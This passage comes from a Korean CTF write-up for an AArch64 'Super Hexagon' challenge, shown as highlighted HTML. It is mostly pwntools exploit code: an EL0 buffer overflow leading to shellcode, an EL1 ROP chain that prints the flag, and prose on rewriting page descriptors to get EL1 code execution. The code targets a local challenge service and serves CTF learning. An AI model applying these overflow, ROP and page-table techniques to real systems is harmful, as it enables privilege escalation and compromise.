style="color:#ae81ff">0x7FFF_7FFF_FFA0</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_D000</span> </span></span><span style="display:flex;"><span>EL0_WSM <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_E000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_00FC</span> </span></span><span style="display:flex;"><span>EL0_LDR_X19_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0294</span> </span></span><span style="display:flex;"><span>EL0_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0100</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el0_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x120</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> make_shellcode(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> len(pl) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x1000</span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">0x100</span> <span style="color:#f92672">-</span> len(pl)) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>] <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x44</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;mprotect&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">0x1000</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> load_key(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_RET) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(DUMMY_VALUE) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_SFP_IN_RUN <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x30</span>) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> p64(EL0_STACK_LOW <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_BUF <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x120</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el1_return_oriented_programming</span>( </span></span><span style="display:flex;"><span> rop_chain: list[int], el0_additional_assembly: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span>) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> ROP_CHAIN_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019C00</span> </span></span><span style="display:flex;"><span> EL1_SYSCALL_HANDLER_RET_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019BB8</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> rop_chain <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span><span style="color:#f92672">.</span>join([p64(gadget) <span style="color:#66d9ef">for</span> gadget <span style="color:#f92672">in</span> rop_chain]) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> rop_chain <span style="color:#f92672">and</span> len(rop_chain) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x420</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> el0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x22, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x23, =</span><span style="color:#e6db74">{</span>len(rop_chain)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x24, =</span><span style="color:#e6db74">{</span>ROP_CHAIN_ADDR<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> read_rop_chain: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x1, x24, x22;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x22, x22, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x22, x23;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_rop_chain </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(EL1_SYSCALL_HANDLER_RET_ADDR<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> el0_additional_assembly </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(rop_chain) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x94</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run.sh&#34;)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run_debug.sh&#34;)</span> </span></span><span style="display:flex;"><span>el0_elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL1_PRINT_FLAG <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0008408</span> </span></span><span style="display:flex;"><span>chain <span style="color:#f92672">=</span> [<span style="color:#ae81ff">0</span>, EL1_PRINT_FLAG] </span></span><span style="display:flex;"><span>el1_return_oriented_programming(chain) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Flag (EL1): &#34;</span>) </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline()[:<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>] </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Flag: </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span></code></pre></div><h4 id="arbitrary-code-execute">Arbitrary Code Execute</h4> <p>EL1 에서의 임의 코드 실행은 Page Table 을 변경하여 수행할 수 있다. EL1 에서의 <code>TTBR0_EL1</code> 과 <code>TTBR1_EL1</code> 은 각각 <code>0x20000</code> 와 <code>0x1B000</code> 로 설정되어 있다. 또한 이 주소 값은 <code>PA:0x40020000</code> 와 <code>PA:0x4001B000</code> 과 같다.</p> <p>다음 그림을 보면 알 수 있듯 <code>PA:0x400nn000</code> 은 <code>EL1:0xFFFF_FFFF_C00n_n000</code> 과 매핑되어 있다는 것을 알 수 있다. 그러면 상기한 read 의 취약점을 이용해서 <code>TTBRn_EL1</code> 에 있는 Page Descriptor 들을 바꿀 수 있다.<br> <img src="./images/arm_super_hexagon_translation.png" alt="arm_super_hexagon_translation.png"></p> <p>Page Descriptor 를 변경할 수 있으므로 UXN, PXN 이 모두 해제된 페이지를 만들 수 있다. 다만 RWX 영역은 EL2 에서 방지하므로 EL1 에서 mmap 으로 RW- 영역을 만들고 원하는 쉘 코드를 작성한 뒤 R-X 로 변경한 뒤에 Page Descriptor 를 변경해야 한다.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>DUMMY_VALUE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xDEAD_BEEF_CAFE_BEBE</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_STACK_LOW <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_E000</span> </span></span><span style="display:flex;"><span>EL0_SFP_IN_RUN <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_FFA0</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_D000</span> </span></span><span style="display:flex;"><span>EL0_WSM <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_E000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_00FC</span> </span></span><span style="display:flex;"><span>EL0_LDR_X19_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0294</span> </span></span><span style="display:flex;"><span>EL0_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0100</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el0_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x120</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> make_shellcode(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> len(pl) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x1000</span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">0x100</span> <span style="color:#f92672">-</span> len(pl)) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>] <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x44</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;mprotect&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">0x1000</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> load_key(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_RET) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(DUMMY_VALUE) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_SFP_IN_RUN <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x30</span>) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> p64(EL0_STACK_LOW <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_BUF <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x120</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el1_return_oriented_programming</span>( </span></span><span style="display:flex;"><span> rop_chain: list[int], </span></span><span style="display:flex;"><span> el0_head_assembly: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> head_input: bytes <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> el0_tail_assembly: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> tail_input: bytes <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span>) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> ROP_CHAIN_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019C00</span> </span></span><span style="display:flex;"><span> EL1_SYSCALL_HANDLER_RET_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019BB8</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> rop_chain <span style="color:#f92672">=</span> rop_chain[:<span style="color:#ae81ff">2</span>] <span style="color:#f92672">+</span> [<span style="color:#ae81ff">0</span>] <span style="color:#f92672">*</span> <span style="color:#ae81ff">2</span> <span style="color:#f92672">+</span> rop_chain[<span style="color:#ae81ff">2</span>:] </span></span><span style="display:flex;"><span> rop_chain <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span><span style="color:#f92672">.</span>join([p64(gadget) <span style="color:#66d9ef">for</span> gadget <span style="color:#f92672">in</span> rop_chain]) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> rop_chain <span style="color:#f92672">and</span> len(rop_chain) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x420</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> el0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> el0_head_assembly </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x22, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x23, =</span><span style="color:#e6db74">{</span>len(rop_chain)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x24, =</span><span style="color:#e6db74">{</span>ROP_CHAIN_ADDR<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> read_rop_chain: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x1, x24, x22;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x22, x22, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x22, x23;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_rop_chain </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(EL1_SYSCALL_HANDLER_RET_ADDR<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> el0_tail_assembly </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(head_input) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(rop_chain) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x94</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> p<span 